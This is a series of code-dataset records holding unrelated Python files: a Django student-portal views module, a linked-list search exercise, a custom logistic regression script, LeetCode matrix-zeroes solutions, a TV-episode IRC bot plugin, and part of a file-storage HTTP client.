UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n\n \n\n \n return render(request, 'users/profile.html', {'user_profile':user_profile, 'today':today, 'current_time': current_time})\n\n\n@login_required(login_url='student_login')\ndef settings(request):\n\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n \n\n if request.method == 'POST':\n if request.FILES.get('image') == None:\n user = request.user.username\n address = request.POST['address']\n contact = request.POST['contact']\n image = user_profile.profile_img\n\n user_profile.address = address\n user_profile.contact = contact\n user_profile.profile_img = image\n\n user_profile.save()\n\n messages.success(request, f\"Information saved\")\n\n return redirect('settings')\n \n\n \n else:\n user = request.user.username\n address = request.POST['address']\n contact = request.POST['contact']\n image = request.FILES.get('image')\n\n user_profile.user = request.user\n user_profile.address = address\n user_profile.contact = contact\n user_profile.profile_img = image\n\n user_profile.save()\n\n messages.success(request, f\"Information saved\")\n\n return redirect('settings')\n\n \n return render(request, \"users/settings.html\", {'user_profile':user_profile, 'today':today, 'current_time':current_time})\n\n\n\n@login_required(login_url='student_login')\ndef delete_course(request):\n\n if request.method == 'POST':\n course = request.POST['delete_course']\n\n delete_course = Enrollment.objects.get(user=request.user, course_name = course)\n delete_course.delete()\n\n messages.warning(request, f\"{course} dropped\")\n\n return redirect(\"enrollment\")\n \n return redirect(\"enrollment\")\n\n \n\n\n\n@login_required(login_url='student_login')\ndef fees(request):\n\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n\n fees_object = Fees.objects.filter(user=request.user)\n\n\n if request.method == 'POST':\n\n fees_payment = Fees.objects.get(user=request.user)\n paid_fees = int(request.POST['payment'])\n \n\n fees_payment.paid = fees_payment.paid + paid_fees\n fees_payment.balance = fees_payment.balance - paid_fees\n\n fees_payment.save()\n\n messages.info(request, f\"Thank you for your payment of {paid_fees}\")\n\n \n\n\n\n\n return render(request, \"users/fees.html\" , {'user_profile':user_profile, 'today':today, 'current_time': current_time, 'fees_object': fees_object})\n\n\n\n \n \n\n return render(request, \"users/online_class.html\", {'user_profile': user_profile, 'today':today, 'current_time': current_time,'class_time': class_time,})\n\n\n@login_required(login_url='student_login')\ndef online_class(request):\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n class_time = \"no\"\n hour = int(now.strftime(\"%H\"))\n\n\n if Enrollment.objects.filter(user=request.user):\n user_enrollments = Enrollment.objects.filter(user=request.user)\n for enrollment in user_enrollments:\n\n if enrollment.course_time == 'morning' and hour >8 and hour <12:\n class_time = \"yes\"\n shift_course = Enrollment.objects.get(course_time = 'morning', user=request.user)\n\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n\n\n\n elif enrollment.course_time == 'afternoon' and hour >11 and hour <15:\n class_time = \"yes\"\n shift_course = Enrollment.objects.get(course_time = 'afternoon', user=request.user)\n\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n\n\n\n elif enrollment.course_time == 'evening' and hour >14 and hour <18:\n class_time = \"yes\"\n shift_course = Enrollment.objects.get(course_time = 'evening', user=request.user)\n\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n\n\n\n elif enrollment.course_time == 'night' and hour >17 and hour <21:\n class_time = 'Yes'\n shift_course = Enrollment.objects.get(course_time = 'night', user=request.user)\n\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n\n \n\n\n else:\n shift_course = \"None of your enrolled courses have a class at this time\"\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n \n \n else:\n shift_course = \"You are currently not enrolled in any courses\"\n return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n 'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course':shift_course})\n \n \n\n\n@login_required(login_url='student_login')\ndef exam(request):\n \n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n exam_time = \"no\"\n\n month = now.strftime(\"%m\")\n\n if int(month) == 5 or int(month) == 11:\n exam_time = \"yes\"\n\n \n\n return render(request, \"users/exam.html\", {'user_profile': user_profile, 'today':today, 'current_time': current_time,'exam_time': exam_time,})\n\n\n@login_required(login_url='student_login')\ndef voting(request):\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n form = VoteForm()\n\n if UserVotes.objects.filter(voter=request.user):\n votes_object = UserVotes.objects.get(voter=request.user)\n\n votes_count = Voting.objects.all()\n\n option1_votes = Voting.objects.get(id=1)\n option1_votes = option1_votes.votes\n\n\n option2_votes = Voting.objects.get(id=2)\n option2_votes = option2_votes.votes\n\n option3_votes = Voting.objects.get(id=3)\n option3_votes = option3_votes.votes\n\n option4_votes = Voting.objects.get(id=4)\n option4_votes = option4_votes.votes\n\n option5_votes = Voting.objects.get(id=5)\n option5_votes = option5_votes.votes\n\n option6_votes = Voting.objects.get(id=6)\n option6_votes = option6_votes.votes\n\n option7_votes = Voting.objects.get(id=7)\n option7_votes = option7_votes.votes\n\n total_votes = option1_votes + option2_votes + option3_votes + option4_votes + option5_votes + option6_votes + option7_votes\n\n\n return render(request, \"users/voting.html\", {'user_profile': user_profile, 'today':today, \n 'current_time': current_time,'votes_object': votes_object, 'votes_count':votes_count, 'total_votes':total_votes\n })\n \n\n else:\n if request.method == 'POST':\n form = VoteForm(request.POST)\n if form.is_valid():\n vote = form.cleaned_data['vote']\n vote_instance = Voting.objects.get(option=vote)\n \n votes_object = UserVotes.objects.create(voter=request.user, chosen_option = vote_instance, has_voted = True)\n\n chosen_option = Voting.objects.get(option=vote)\n chosen_option.votes = chosen_option.votes+1\n chosen_option.save()\n\n messages.info(request, f\"voted {vote}\")\n \n\n\n return redirect('voting')\n return render(request, \"users/voting.html\", {'user_profile': user_profile, 'today':today, 'current_time': current_time, 'form':form })\n\n\n@login_required(login_url='student_login')\ndef enrollment(request):\n\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n student_courses = Enrollment.objects.filter(user = request.user) \n\n\n return render(request, \"users/enrollment.html\", {'user_profile': user_profile, 'today':today, 'current_time': current_time, 'student_courses':student_courses})\n\n@login_required(login_url='student_login')\ndef add_course(request):\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n fees_object = Fees.objects.get(user=request.user)\n available_courses = AvailableCourses.objects.filter(course_for= user_profile.degree_title) | AvailableCourses.objects.filter(course_for = 'all') \n shift =[]\n i = 0\n\n if Enrollment.objects.filter(user=request.user):\n enrollment_object = Enrollment.objects.filter(user=request.user)\n\n for courses in enrollment_object:\n \n shift.append(courses.course_time)\n available_courses = available_courses.exclude(course_time=shift[i])\n i= i+1\n \n \n if request.method == 'POST':\n\n if not request.POST:\n return redirect('add_course')\n course = request.POST['course']\n \n course = AvailableCourses.objects.get(course_name=course)\n\n add_course = Enrollment.objects.create(user=request.user, course_name=course.course_name, course_for=course.course_for, course_time=course.course_time)\n add_course.save()\n\n fees_object.course_fees = fees_object.course_fees + 10000\n fees_object.balance = fees_object.balance + 10000\n fees_object.save()\n\n messages.info(request, f\"{course} course added \")\n\n return redirect('enrollment')\n \n return render(request, \"users/add_course.html\", {'user_profile': user_profile, 'today':today, 'current_time': current_time, 'available_courses':available_courses})\n\n\n\n\n\n\n ","repo_name":"Faiz-Rasul/first_project","sub_path":"step/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"46446915981","text":"'''\nQUESTION -\n----------\nSearch for a specific value in a linked list. Return True if present and False if not present.\nSample Input: 10 --> 20 --> 30 --> 50 --> 40 and search node with value = 20\nOutput: True\n\nAPPROACH -\n----------\n 1. Start from the head node and traverse through the list.\n 2. Traverse till we find the node with the desired value.\n - If the desired value is found, then return True.\n - If the desired value is not found after traversing the entire list, then return False.\n\n TIME COMPLEXITY - O(N) as we traversed through the LL\n SPACE COMPLEXITY - O(1)\n'''\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\nclass Solution:\n def searchLinkedList(self, head, N):\n current = head\n\n while current:\n if current.value == N:\n return True\n current = current.next\n\n return False\n\n\nif __name__ == '__main__':\n node1 = Node(0)\n node2 = Node(-12)\n node3 = Node(72)\n node4 = Node(100)\n node5 = Node(72)\n\n node1.next = node2\n node2.next = node3\n node3.next = node4\n node4.next = node5\n\n s = Solution()\n print(s.searchLinkedList(node1, -11)) #This will return False\n print(s.searchLinkedList(node1, -12)) #This will return True\n","repo_name":"setu-parekh/DS-Algo-Coding-Challenges","sub_path":"Linked_List/Educative/search_in_singly_linked_list.py","file_name":"search_in_singly_linked_list.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38516034712","text":"import numpy as np\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\n\n\nclass CustomLogisticRegression:\n\n def __init__(self, fit_intercept=True, l_rate=0.01, n_epoch=100):\n self.fit_intercept = fit_intercept\n self.l_rate = l_rate\n self.n_epoch = n_epoch\n self.first_mse = []\n self.last_mse = []\n self.first_log_loss = []\n self.last_log_loss = []\n\n def sigmoid(self, t):\n return 1 / (1 + np.exp(-t))\n\n def predict_proba(self, row, coef_):\n if self.fit_intercept:\n row = np.insert(row, 0, np.ones(row.shape[0]), axis=1)\n t = row.dot(coef_)\n return self.sigmoid(t)\n\n def mse(self, X, y):\n yhat = self.predict_proba(X, self.coef_)\n return ((yhat - y) ** 2).mean()\n\n def update_coef_mse(self, row, yval):\n yhat = self.predict_proba(row, self.coef_)\n dJdt = (yhat - yval) * yhat * (1 - yhat)\n self.coef_ += -self.l_rate * dJdt * row\n\n\n def fit_mse(self, X_train, y_train):\n n = X_train.shape[0]\n if self.fit_intercept:\n X_train = np.insert(X_train, 0, np.ones(n), axis=1)\n self.coef_ = np.zeros(X_train.shape[1])\n self.fit_intercept = False\n\n for i in range(n):\n self.update_coef_mse(X_train[i], y_train[i])\n self.first_mse.append(self.mse(X_train, y_train))\n\n for epoch in range(self.n_epoch - 2):\n for i in range(n):\n self.update_coef_mse(X_train[i], y_train[i])\n\n for i in range(n):\n self.update_coef_mse(X_train[i], y_train[i])\n self.last_mse.append(self.mse(X_train, y_train))\n\n self.fit_intercept = True\n\n def log_loss(self, X, y):\n yhat = self.predict_proba(X, self.coef_)\n return -(y * np.log(yhat) + (1 - y) * np.log(1 - yhat)).mean()\n\n def update_coef_log(self, row, yval, n):\n yhat = self.predict_proba(row, self.coef_)\n y_error = (yhat - yval)\n self.coef_ += -self.l_rate * y_error * row / n\n\n def fit_log_loss(self, X_train, y_train):\n n = X_train.shape[0]\n if self.fit_intercept:\n X_train = np.insert(X_train, 0, np.ones(n), axis=1)\n self.coef_ = np.zeros(X_train.shape[1])\n self.fit_intercept = False\n\n for i in range(n):\n self.update_coef_log(X_train[i], y_train[i], n)\n self.first_log_loss.append(self.log_loss(X_train, y_train))\n\n for epoch in range(self.n_epoch - 2):\n for i in range(n):\n self.update_coef_log(X_train[i], y_train[i], n)\n\n for i in range(n):\n self.update_coef_log(X_train[i], y_train[i], n)\n self.last_log_loss.append(self.log_loss(X_train, y_train))\n\n self.fit_intercept = True\n\n def predict(self, X_test, cut_off=0.5):\n yhat = self.predict_proba(X_test, self.coef_)\n return (yhat >= cut_off).astype(int)\n\n\ndef load_data():\n data = datasets.load_breast_cancer()\n col_names = ['worst concave points', 'worst perimeter', 'worst radius']#\n col_inds = [np.where(data.feature_names == name)[0][0] for name in col_names]\n X = data.data[:,col_inds]\n y = data.target\n return (X, y)\n\n\ndef standardise_data(X):\n mean_vals = X.mean(axis=0)\n std_vals = X.std(axis=0)\n return (X - mean_vals) / std_vals\n\n\ndef split_data(X, y):\n return train_test_split(X, y, train_size=0.8, random_state=43)\n\n\nX, y = load_data()\nX = standardise_data(X)\nX_train, X_test, y_train, y_test = split_data(X, y)\n\nmodel = CustomLogisticRegression(fit_intercept=True, l_rate=0.01, n_epoch=1000)\n\nmodel.fit_mse(X_train, y_train)\ny_pred_mse = model.predict(X_test)\n\nmodel.fit_log_loss(X_train, y_train)\ny_pred_log = model.predict(X_test)\n\nskmodel = LogisticRegression()\nskmodel.fit(X_train, y_train)\ny_pred_sk = model.predict(X_test)\n\nprint({'mse_accuracy': accuracy_score(y_pred_mse, y_test),\n 'logloss_accuracy': accuracy_score(y_pred_log, y_test),\n 'sklearn_accuracy': accuracy_score(y_pred_sk, y_test),\n 'mse_error_first': model.first_mse,\n 'mse_error_last': model.last_mse,\n 'logloss_error_first': model.first_log_loss,\n 'logloss_error_last': model.last_log_loss})\n\nprint(\"\"\"Answers to the questions:\n1) 0.0001\n2) 0.0000\n3) 0.00152\n4) 0.0055\n5) expanded\n6) expanded\n\"\"\"\n)\n# res = {'coef_': list(model.coef_), 'accuracy': acc}\n# print(res)\n","repo_name":"alcala21/logistic-regression","sub_path":"logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15610781551","text":"\"\"\"\n\n73. Set Matrix Zeroes\nMedium\n\nGiven an m x n integer matrix matrix, if an element is 0, set its entire row and column to 0's.\n\nYou must do it in place.\n\n \n\nExample 1:\n\n\nInput: matrix = [[1,1,1],[1,0,1],[1,1,1]]\nOutput: [[1,0,1],[0,0,0],[1,0,1]]\nExample 2:\n\n\nInput: matrix = [[0,1,2,0],[3,4,5,2],[1,3,1,5]]\nOutput: [[0,0,0,0],[0,4,5,0],[0,3,1,0]]\n \n\nConstraints:\n\nm == matrix.length\nn == matrix[0].length\n1 <= m, n <= 200\n-231 <= matrix[i][j] <= 231 - 1\n \n\nFollow up:\n\nA straightforward solution using O(mn) space is probably a bad idea.\nA simple improvement uses O(m + n) space, but still not the best solution.\nCould you devise a constant space solution?\n\n\"\"\"\n\n# V0\n# IDEA : array op\nclass Solution(object):\n def setZeroes(self, matrix):\n # edge case\n if not matrix:\n return\n l = len(matrix)\n w = len(matrix[0])\n # get zeros\n x_zeros = set()\n y_zeros = set()\n for i in range(l):\n for j in range(w):\n if matrix[i][j] == 0:\n x_zeros.add(j)\n y_zeros.add(i)\n\n # row -> 0\n for i in y_zeros:\n matrix[i] = [0] * w\n # col -> 0\n for i in x_zeros:\n for j in range(l):\n matrix[j][i] = 0\n\n #print (\"matrix = \" + str(matrix))\n\n# V0'\n# IDEA : array op\nclass Solution(object):\n def setZeroes(self, matrix): \n\n if not matrix:\n return matrix\n\n def help(matrix, xy):\n ### NOTE : \n # -> for cases matrix[i][j]:\n # -> y is FIRST element (i)\n # -> x is SECOND element (j)\n x = xy[1]\n y = xy[0]\n matrix[y] = [0] * len(matrix[0])\n for j in range(len(matrix)):\n matrix[j][x] = 0\n return matrix\n\n _list = []\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n _list.append([i,j])\n\n for xy in _list:\n matrix = help(matrix, xy)\n return matrix\n\n# V0''\n# IDEA : array op\nclass Solution:\n def setZeroes(self, matrix):\n rownum = len(matrix)\n colnum = len(matrix[0])\n row = [False for i in range(rownum)]\n col = [False for i in range(colnum)]\n for i in range(rownum):\n for j in range(colnum):\n if matrix[i][j] == 0:\n row[i] = True\n col[j] = True\n for i in range(rownum):\n for j in range(colnum):\n if row[i] == True or col[j] == True:\n matrix[i][j] = 0\n\n# V1 \n# https://www.cnblogs.com/zuoyuan/p/3769698.html\n# TIME COMPLEXITY : O(N*M)\n# SPACE COMPLEXITY : O(N+M)\n# IDEA : RECORD X, Y (X, Y AXIS) TO CHECK IF THERE IS 0 EXISTING \n# THEN GO THROUGH ARRAY TO CHECK RELATIVE ROWS AND COLUMNS \n# AND UPDATE THE VALUES (value -> 0)\nclass Solution:\n # @param matrix, a list of lists of integers\n # RETURN NOTHING, MODIFY matrix IN PLACE.\n def setZeroes(self, matrix):\n rownum = len(matrix)\n colnum = len(matrix[0])\n row = [False for i in range(rownum)]\n col = [False for i in range(colnum)]\n for i in range(rownum):\n for j in range(colnum):\n if matrix[i][j] == 0:\n row[i] = True\n col[j] = True\n for i in range(rownum):\n for j in range(colnum):\n if row[i] or col[j]:\n matrix[i][j] = 0\n # for test case\n #return matrix \n\n### Test case\ns=Solution()\nassert s.setZeroes([[]]) == [[]]\nassert s.setZeroes([[0]]) == [[0]]\nassert s.setZeroes([[1]]) == [[1]]\nassert s.setZeroes([[1,2,3]]) == [[1,2,3]]\nassert s.setZeroes([[0,2,3]]) == [[0,0,0]]\nassert s.setZeroes([[1,2,3],[4,5,6]]) == [[1,2,3],[4,5,6]]\nassert s.setZeroes([[1,2,3], [4,5,6], [7,8,9]]) == [[1,2,3], [4,5,6], [7,8,9]]\nassert s.setZeroes([[1,2,3], [4,0,6], [7,8,9]]) == [[1,0,3], [0,0,0], [7,0,9]]\nassert s.setZeroes([[1,2,3,999], [4,0,6,0], [0,7,8,9]]) == [[0, 0, 3, 0], [0, 0, 0, 0], [0, 0, 0, 0]]\nassert s.setZeroes([[0,0,0], [0,0,0], [0,0,0]]) == [[0,0,0], [0,0,0], [0,0,0]]\n\n# V1''\n# https://leetcode.com/problems/set-matrix-zeroes/solution/\n# IDEA : BRUTE FORCE + DOUBLE LOOP\n# TIME COMPLEXITY : O(N*M)\n# SPACE COMPLEXITY : O(N+M)\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: void Do not return anything, modify matrix in-place instead.\n \"\"\"\n R = len(matrix)\n C = len(matrix[0])\n rows, cols = set(), set()\n\n # Essentially, we mark the rows and columns that are to be made zero\n for i in range(R):\n for j in range(C):\n if matrix[i][j] == 0:\n rows.add(i)\n cols.add(j)\n\n # Iterate over the array once again and using the rows and cols sets, update the elements\n for i in range(R):\n for j in range(C):\n if i in rows or j in cols:\n matrix[i][j] = 0\n \n# V1'''\n# https://leetcode.com/problems/set-matrix-zeroes/solution/\n# TIME COMPLEXITY : O((N*M))\n# SPACE COMPLEXITY : O(1)\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: void Do not return anything, modify matrix in-place instead.\n \"\"\"\n is_col = False\n R = len(matrix)\n C = len(matrix[0])\n for i in range(R):\n # Since first cell for both first row and first column is the same i.e. matrix[0][0]\n # We can use an additional variable for either the first row/column.\n # For this solution we are using an additional variable for the first column\n # and using matrix[0][0] for the first row.\n if matrix[i][0] == 0:\n is_col = True\n for j in range(1, C):\n # If an element is zero, we set the first element of the corresponding row and column to 0\n if matrix[i][j] == 0:\n matrix[0][j] = 0\n matrix[i][0] = 0\n\n # Iterate over the array once again and using the first row and first column, update the elements.\n for i in range(1, R):\n for j in range(1, C):\n if not matrix[i][0] or not matrix[0][j]:\n matrix[i][j] = 0\n\n # See if the first row needs to be set to zero as well\n if matrix[0][0] == 0:\n for j in range(C):\n matrix[0][j] = 0\n\n # See if the first column needs to be set to zero as well \n if is_col:\n for i in range(R):\n matrix[i][0] = 0\n \n# V1'''\n# https://leetcode.com/problems/set-matrix-zeroes/solution/\n# TIME COMPLEXITY : O((N*M)*(N+M))\n# SPACE COMPLEXITY : O(1)\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: void Do not return anything, modify matrix in-place instead.\n \"\"\"\n MODIFIED = -1000000\n R = len(matrix)\n C = len(matrix[0])\n for r in range(R):\n for c in range(C):\n if matrix[r][c] == 0:\n # We modify the elements in place. Note, we only change the non zeros to MODIFIED\n for k in range(C):\n matrix[r][k] = MODIFIED if matrix[r][k] != 0 else 0\n for k in range(R):\n matrix[k][c] = MODIFIED if matrix[k][c] != 0 else 0\n for r in range(R):\n for c in range(C):\n # Make a second pass and change all MODIFIED elements to 0 \"\"\"\n if matrix[r][c] == MODIFIED:\n matrix[r][c] = 0\n\n# V1''''\n# https://blog.csdn.net/qqxx6661/article/details/78279728\nclass Solution:\n # @param matrix, a list of lists of integers\n # RETURN NOTHING, MODIFY matrix IN PLACE.\n def setZeroes(self, matrix):\n m , n = len(matrix), len(matrix[0])\n row , col = [0 for i in range(m)] , [0 for i in range(n)]\n for i in range(m):\n for j in range(n):\n if not matrix[i][j]:\n row[i]=col[j]=1\n for i in range(m):\n if row[i]:\n for j in range(n):\n matrix[i][j]=0\n\n for j in range(n):\n if col[j]:\n for i in range(m):\n matrix[i][j]=0\n\n# V1'''''''\n# https://blog.csdn.net/qqxx6661/article/details/78279728\nclass Solution:\n # @param matrix, a list of lists of integers\n # RETURN NOTHING, MODIFY matrix IN PLACE.\n def setZeroes(self, matrix):\n m , n = len(matrix), len(matrix[0])\n temp = [[matrix[i][j] for j in range(n)] for i in range(m)]\n for i in range(m):\n for j in range(n):\n if not temp[i][j]:\n self.setZero(i,j,n,m,matrix)\n\n def setZero(self,row,col,n,m,matrix):\n for i in range(m):\n matrix[i][col]=0\n for j in range(n):\n matrix[row][j]=0\n \n# V2 \nfrom functools import reduce\n# Time: O(m * n)\n# Space: O(1)\nclass Solution(object):\n # @param matrix, a list of lists of integers\n # RETURN NOTHING, MODIFY matrix IN PLACE.\n def setZeroes(self, matrix):\n first_col = reduce(lambda acc, i: acc or matrix[i][0] == 0, range(len(matrix)), False)\n first_row = reduce(lambda acc, j: acc or matrix[0][j] == 0, range(len(matrix[0])), False)\n\n for i in range(1, len(matrix)):\n for j in range(1, len(matrix[0])):\n if matrix[i][j] == 0:\n matrix[i][0], matrix[0][j] = 0, 0\n\n for i in range(1, len(matrix)):\n for j in range(1, len(matrix[0])):\n if matrix[i][0] == 0 or matrix[0][j] == 0:\n matrix[i][j] = 0\n\n if first_col:\n for i in range(len(matrix)):\n matrix[i][0] = 0\n\n if first_row:\n for j in range(len(matrix[0])):\n matrix[0][j] = 0","repo_name":"yennanliu/CS_basics","sub_path":"leetcode_python/Array/set-matrix-zeroes.py","file_name":"set-matrix-zeroes.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"35470319872","text":"import run\n\nd = run.d\nd['dqn.no_replay'] = True\nd['visualize'] = 'q'\nd['dqn.replay_start_size'] = 100\nd['dqn.log_frequency'] = 10\nd['dqn.final_epsilon'] = 0.1\nd['dqn.initial_epsilon'] = 0.1\nd['weights_dir'] = 'weights'\nd['show_mood'] = run.Plot\nrun.main(**d)\n","repo_name":"yenchenlin/deep-q-learning","sub_path":"run_play.py","file_name":"run_play.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"5085728783","text":"# -*- coding: utf-8 -*-\n\nfrom commands import Command\nimport re\nimport utility\n\nclass NextEpisodeCommand(Command):\n\tapi_url = \"http://services.tvrage.com/tools/quickinfo.php?show=%s\"\n\tsearch_url = \"http://tvrage.com/search.php?search=%s\"\n\tpattern = re.compile(r\"(.+?)@(.+)\")\n\tusage = \"Usage: .nextep Name of TV Show\"\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef fetch_tv_info(self, show):\n\t\tinfo = {}\n\t\tdata = utility.read_url(self.api_url % show)[\"data\"]\n\t\tfor m in self.pattern.finditer(data):\n\t\t\tinfo[m.group(1)] = m.group(2)\n\t\treturn info\n\n\tdef trig_nextep(self, bot, source, target, trigger, argument):\n\t\t\"\"\"Information about the latest and next episode of a TV show.\"\"\"\n\n\t\t# Sanitize argument\n\t\targument = utility.escape(argument.strip())\n\n\t\tif not argument:\n\t\t\treturn self.usage\n\n\t\t# Fetch data\n\t\tinfo = self.fetch_tv_info(argument)\n\t\tif \"Show Name\" not in info:\n\t\t\treturn \"TV show not found | Manual search: \" + (self.search_url % argument)\n\t\t\n\t\t# Name of TV series\n\t\tname = info[\"Show Name\"]\n\n\t\t# Premiere year\n\t\tif \"Premiered\" in info:\n\t\t\tname += \" (\" + info[\"Premiered\"] + \")\"\n\t\t\n\t\t# Latest episode\n\t\tif \"Latest Episode\" in info:\n\t\t\tlast_ep = info[\"Latest Episode\"].replace(\"^\", \", \")\n\t\telse:\n\t\t\tlast_ep = \"Unknown\"\n\n\t\t# Next episode\n\t\tif \"Next Episode\" in info:\n\t\t\tnext_ep = info[\"Next Episode\"].replace(\"^\", \", \")\n\t\telse:\n\t\t\tnext_ep = \"Unknown\"\n\t\t\tif \"Status\" in info:\n\t\t\t\tnext_ep += \" - \" + info[\"Status\"].replace(\"^\", \", \")\n\t\t\n\t\t# Info URL\n\t\tif \"Show URL\" in info:\n\t\t\turl = info[\"Show URL\"]\n\t\telse:\n\t\t\turl = self.search_url % argument\n\t\t\n\t\t# Compose result\n\t\treturn \"%s | Latest: %s | Next: %s | Read more: %s\" % (name, last_ep, next_ep, url)\n\t\t\t\n","repo_name":"dhtech/pyirkbot","sub_path":"plugins/nextep.py","file_name":"nextep.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37175083227","text":"import configparser\nimport os\nimport re\n\nimport requests\nfrom requests import Response\n\nconfig = configparser.ConfigParser()\nconfig.read('client.ini')\nHOST = config[\"DEFAULT\"][\"host\"]\nPORT = config[\"DEFAULT\"][\"port\"]\n\ncurrent_directory = ''\n\n\ndef info_query(query):\n return f'http://{HOST}:{PORT}/files/info/{query}'\n\n\ndef file_query(query):\n return f'http://{HOST}:{PORT}/files/{query}'\n\n\ndef common_query(query):\n return f'http://{HOST}:{PORT}/{query}'\n\n\ndef make_request(request_function, args):\n result: Response = request_function(args)\n if result.status_code == 404 or '404 Not Found' in result.text:\n return 'No result found'\n elif result.status_code == 500:\n return 'Some error occurred'\n else:\n return result.text\n\n\ndef get_path(some_path: str):\n if some_path.startswith('./'):\n if current_directory == '':\n slash = ''\n else:\n slash = '/'\n return f'{current_directory.lstrip(\"/\")}{slash}{some_path.lstrip(\"./\")}'\n else:\n return some_path.lstrip(\"/\")\n\n\n# Commands section\n# -----------------------------------\n\ndef initialize() -> requests.Response:\n return requests.get(common_query('initialize'))\n\n\ndef create_file(file_name: str, path_to_file: str):\n final_path = get_path(path_to_file.strip() + '/' + file_name.strip())\n requests.post(file_query(final_path), data=b'')\n\n\ndef write_file(file_from: str, file_to: str):\n data = open(file_from, 'rb').read()\n requests.post(file_query(get_path(file_to)), data=data)\n\n\ndef read_file(file_from: str, file_to: str):\n get = requests.get(file_query(get_path(file_from)))\n if get.status_code == 404:\n return 'No result found'\n elif get.status_code == 500:\n return 'Some error occurred'\n else:\n if '/' in file_to:\n path_to_folder = file_to[: file_to.rfind('/')]\n if not os.path.exists(path_to_folder):\n os.makedirs(path_to_folder)\n open(file_to, 'wb').write(get.content)\n\n\ndef delete_file(path_to_file):\n if current_directory != '':\n requests.delete(file_query(f'{current_directory}/{os.path.basename(path_to_file)}'))\n else:\n requests.delete(file_query(os.path.basename(path_to_file)))\n\n\ndef info_file(path_to_file: str):\n path_to_file = get_path(path_to_file.strip())\n return make_request(requests.get, info_query(path_to_file))\n\n\ndef copy_file(file_from: str, file_to: str):\n file_from = get_path(file_from.strip())\n file_to = get_path(file_to.strip())\n\n request = make_request(requests.get, info_query(file_from))\n if (request == 'No result found') or (request == 'Some error occurred'):\n return request\n else:\n file = requests.get(file_query(file_from)).content\n requests.post(file_query(file_to), data=file)\n return 'OK'\n\n\ndef move_file(file_from: str, file_to: str):\n file_from = get_path(file_from.strip())\n file_to = get_path(file_to.strip())\n\n request = make_request(requests.get, info_query(file_from))\n if (request == 'No result found') or (request == 'Some error occurred'):\n return request\n else:\n file = requests.get(file_query(file_from)).content\n requests.delete(file_query(file_from))\n 